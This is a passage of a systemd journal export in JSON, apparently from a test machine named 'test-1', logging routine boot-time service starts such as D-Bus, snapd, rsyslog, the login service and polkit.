"__REALTIME_TIMESTAMP" : "1615280818729169", "__MONOTONIC_TIMESTAMP" : "44446057", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Accounts Service...", "UNIT" : "accounts-daemon.service", "INVOCATION_ID" : "fb8c38edec2345e7ac064ca6e9088f83", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818132053" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=315;b=e2b08827b5804427b422c10c84f1567e;m=2a631b7;t=5bd16df69b11e;x=62f06e0e7556c3cb", "__REALTIME_TIMESTAMP" : "1615280818729246", "__MONOTONIC_TIMESTAMP" : "44446135", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Pollinate to seed the pseudo random number generator...", "UNIT" : "pollinate.service", "INVOCATION_ID" : "5edd02af8c5c46d9a48fd71b8afc0a40", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818137998" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=316;b=e2b08827b5804427b422c10c84f1567e;m=2a63203;t=5bd16df69b16a;x=d489302caa2261be", "__REALTIME_TIMESTAMP" : "1615280818729322", "__MONOTONIC_TIMESTAMP" : "44446211", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting LSB: Record successful boot for GRUB...", "UNIT" : "grub-common.service", "INVOCATION_ID" : "ba0792509caa4bd78d4591f02aac479a", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818151385" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=317;b=e2b08827b5804427b422c10c84f1567e;m=2a6324e;t=5bd16df69b1b6;x=406920915460381", "__REALTIME_TIMESTAMP" : "1615280818729398", "__MONOTONIC_TIMESTAMP" : "44446286", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Started FUSE filesystem for LXC.", "UNIT" : "lxcfs.service", "INVOCATION_ID" : "6b09b6542bb74a3aa4be9634bca4d61c", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818160126" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=318;b=e2b08827b5804427b422c10c84f1567e;m=2a63297;t=5bd16df69b1ff;x=a8ac43dca251c82f", "__REALTIME_TIMESTAMP" : "1615280818729471", "__MONOTONIC_TIMESTAMP" : "44446359", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Started D-Bus System Message Bus.", "UNIT" : "dbus.service", "INVOCATION_ID" : "ade09c21b8de4fb6a382892237c7d413", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818169699" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=319;b=e2b08827b5804427b422c10c84f1567e;m=2a632fd;t=5bd16df69b264;x=797028d2a0721f41", "__REALTIME_TIMESTAMP" : "1615280818729572", "__MONOTONIC_TIMESTAMP" : "44446461", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "SYSLOG_FACILITY" : "4", "_HOSTNAME" : "test-1", "CODE_FILE" : "../src/login/logind-button.c", "CODE_LINE" : "371", "CODE_FUNC" : "button_open", "SYSLOG_IDENTIFIER" : "systemd-logind", "MESSAGE" : "Watching system buttons on /dev/input/event0 (Power Button)", "_PID" : "784", "_COMM" : "systemd-logind", "_EXE" : "/lib/systemd/systemd-logind", "_CMDLINE" : "/lib/systemd/systemd-logind", "_CAP_EFFECTIVE" : "24420002f", "_SYSTEMD_CGROUP" : "/system.slice/systemd-logind.service", "_SYSTEMD_UNIT" : "systemd-logind.service", "_SYSTEMD_INVOCATION_ID" : "92ace4bf8cc84ed790e29aea96b87129", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818270222" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=31a;b=e2b08827b5804427b422c10c84f1567e;m=2a63468;t=5bd16df69b3cf;x=c81d19038f20e303", "__REALTIME_TIMESTAMP" : "1615280818729935", "__MONOTONIC_TIMESTAMP" : "44446824", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "SYSLOG_FACILITY" : "4", "_HOSTNAME" : "test-1", "CODE_FILE" : "../src/login/logind-button.c", "CODE_LINE" : "371", "CODE_FUNC" : "button_open", "SYSLOG_IDENTIFIER" : "systemd-logind", "_PID" : "784", "_COMM" : "systemd-logind", "_EXE" : "/lib/systemd/systemd-logind", "_CMDLINE" : "/lib/systemd/systemd-logind", "_CAP_EFFECTIVE" : "24420002f", "_SYSTEMD_CGROUP" : "/system.slice/systemd-logind.service", "_SYSTEMD_UNIT" : "systemd-logind.service", "_SYSTEMD_INVOCATION_ID" : "92ace4bf8cc84ed790e29aea96b87129", "MESSAGE" : "Watching system buttons on /dev/input/event1 (AT Translated Set 2 keyboard)", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818270478" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=31b;b=e2b08827b5804427b422c10c84f1567e;m=2a634c0;t=5bd16df69b428;x=5665e3444908c6b1", "__REALTIME_TIMESTAMP" : "1615280818730024", "__MONOTONIC_TIMESTAMP" : "44446912", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "SYSLOG_FACILITY" : "4", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "systemd-logind", "_PID" : "784", "_COMM" : "systemd-logind", "_EXE" : "/lib/systemd/systemd-logind", "_CMDLINE" : "/lib/systemd/systemd-logind", "_CAP_EFFECTIVE" : "24420002f", "_SYSTEMD_CGROUP" : "/system.slice/systemd-logind.service", "_SYSTEMD_UNIT" : "systemd-logind.service", "_SYSTEMD_INVOCATION_ID" : "92ace4bf8cc84ed790e29aea96b87129", "CODE_FILE" : "../src/login/logind-seat.c", "CODE_LINE" : "424", "CODE_FUNC" : "seat_start", "MESSAGE_ID" : "fcbefc5da23d428093f97c82a9290f7b", "SEAT_ID" : "seat0", "MESSAGE" : "New seat seat0.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818270517" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=31c;b=e2b08827b5804427b422c10c84f1567e;m=2a6352c;t=5bd16df69b493;x=566b08c1e3e04161", "__REALTIME_TIMESTAMP" : "1615280818730131", "__MONOTONIC_TIMESTAMP" : "44447020", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Snappy daemon...", "UNIT" : "snapd.service", "INVOCATION_ID" : "7ffc7748c7334851b33f278a253dc6d2", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818338766" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=31d;b=e2b08827b5804427b422c10c84f1567e;m=2a63582;t=5bd16df69b4ea;x=85a338f5b6a97b6d", "__REALTIME_TIMESTAMP" : "1615280818730218", "__MONOTONIC_TIMESTAMP" : "44447106", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Permit User Sessions...", "UNIT" : "systemd-user-sessions.service", "INVOCATION_ID" : "a8e88e06d97b45368fb077320099c4fb", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818344557" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=31e;b=e2b08827b5804427b422c10c84f1567e;m=2a635d3;t=5bd16df69b53a;x=80321e018d4924f9", "__REALTIME_TIMESTAMP" : "1615280818730298", "__MONOTONIC_TIMESTAMP" : "44447187", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "rsyslog.service", "INVOCATION_ID" : "562da32e4e8641b99bedbe865c51feea", "MESSAGE" : "Started System Logging Service.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818352740" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=31f;b=e2b08827b5804427b422c10c84f1567e;m=2a6361b;t=5bd16df69b583;x=37287d3f7131b98f", "__REALTIME_TIMESTAMP" : "1615280818730371", "__MONOTONIC_TIMESTAMP" : "44447259", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "systemd-user-sessions.service", "INVOCATION_ID" : "a8e88e06d97b45368fb077320099c4fb", "MESSAGE" : "Started Permit User Sessions.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818367486" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=320;b=e2b08827b5804427b422c10c84f1567e;m=2a639f5;t=5bd16df69b95d;x=f8b3d302d5b0ac25", "__REALTIME_TIMESTAMP" : "1615280818731357", "__MONOTONIC_TIMESTAMP" : "44448245", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "systemd-logind.service", "INVOCATION_ID" : "92ace4bf8cc84ed790e29aea96b87129", "MESSAGE" : "Started Login Service.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818386163" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=321;b=e2b08827b5804427b422c10c84f1567e;m=2a63a5a;t=5bd16df69b9c1;x=a44c1ff0b2d9943a", "__REALTIME_TIMESTAMP" : "1615280818731457", "__MONOTONIC_TIMESTAMP" : "44448346", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Authorization Manager...", "UNIT" : "polkit.service", "INVOCATION_ID" : "f8c33888140c415190c7d25f87c0b41e", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818393304" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=322;b=e2b08827b5804427b422c10c84f1567e;m=2a63aa7;t=5bd16df69ba0e;x=93403d3ec28c7d8e", "__REALTIME_TIMESTAMP" : "1615280818731534", "__MONOTONIC_TIMESTAMP" : "44448423", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Started Unattended Upgrades Shutdown.", "UNIT" : "unattended-upgrades.service", "INVOCATION_ID" : "64957dc245ff4da68583f884d2b6aa74", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818400923" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=323;b=e2b08827b5804427b422c10c84f1567e;m=2a63b03;t=5bd16df69ba6b;x=9707bf8b74d46972", "__REALTIME_TIMESTAMP" : "1615280818731627", "__MONOTONIC_TIMESTAMP" : "44448515", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Hostname Service...", "UNIT" : "systemd-hostnamed.service", "INVOCATION_ID" : "3e22be523ca64c5ebd2db6de34390f63", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818410195" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=324;b=e2b08827b5804427b422c10c84f1567e;m=2a63b70;t=5bd16df69bad8;x=85db8a79d2d07ec9", "__REALTIME_TIMESTAMP" : "1615280818731736", "__MONOTONIC_TIMESTAMP" : "44448624", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Terminate Plymouth Boot Screen...", "UNIT" : "plymouth-quit.service", "INVOCATION_ID" : "c345885054b24af6bf1126493e521c75", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818417474" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=325;b=e2b08827b5804427b422c10c84f1567e;m=2a63bd1;t=5bd16df69bb38;x=81711fd38359bea3", "__REALTIME_TIMESTAMP" : "1615280818731832", "__MONOTONIC_TIMESTAMP" : "44448721", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Hold until boot process finishes up...", "UNIT" : "plymouth-quit-wait.service", "INVOCATION_ID" : "616c38d09ecf41b98f0a3c178beaa4b6", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818422758" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=326;b=e2b08827b5804427b422c10c84f1567e;m=2a63c48;t=5bd16df69bbb0;x=9d8e718c053be8b2", "__REALTIME_TIMESTAMP" : "1615280818731952", "__MONOTONIC_TIMESTAMP" : "44448840", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "plymouth-quit-wait.service", "INVOCATION_ID" : "616c38d09ecf41b98f0a3c178beaa4b6", "MESSAGE" : "Started Hold until boot process finishes up.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818433141" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=327;b=e2b08827b5804427b422c10c84f1567e;m=2a63cc0;t=5bd16df69bc27;x=1c70448b37921d8c", "__REALTIME_TIMESTAMP" : "1615280818732071", "__MONOTONIC_TIMESTAMP" : "44448960", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Started Serial Getty on ttyS0.", "UNIT" : "serial-getty@ttyS0.service", "INVOCATION_ID" : "6962682f850d410ab6ab4947892896cc", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818438851" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=328;b=e2b08827b5804427b422c10c84f1567e;m=2a63d13;t=5bd16df69bc7b;x=75b6885bd4fa244b", "__REALTIME_TIMESTAMP" : "1615280818732155", "__MONOTONIC_TIMESTAMP" : "44449043", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Set console scheme...", "UNIT" : "setvtrgb.service", "INVOCATION_ID" : "f1b78fb9a2b84e2fa897cc4f1b9c2dbc", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818446792" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=329;b=e2b08827b5804427b422c10c84f1567e;m=2a63d6b;t=5bd16df69bcd3;x=19536e76eaf38387", "__REALTIME_TIMESTAMP" : "1615280818732243", "__MONOTONIC_TIMESTAMP" : "44449131", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : 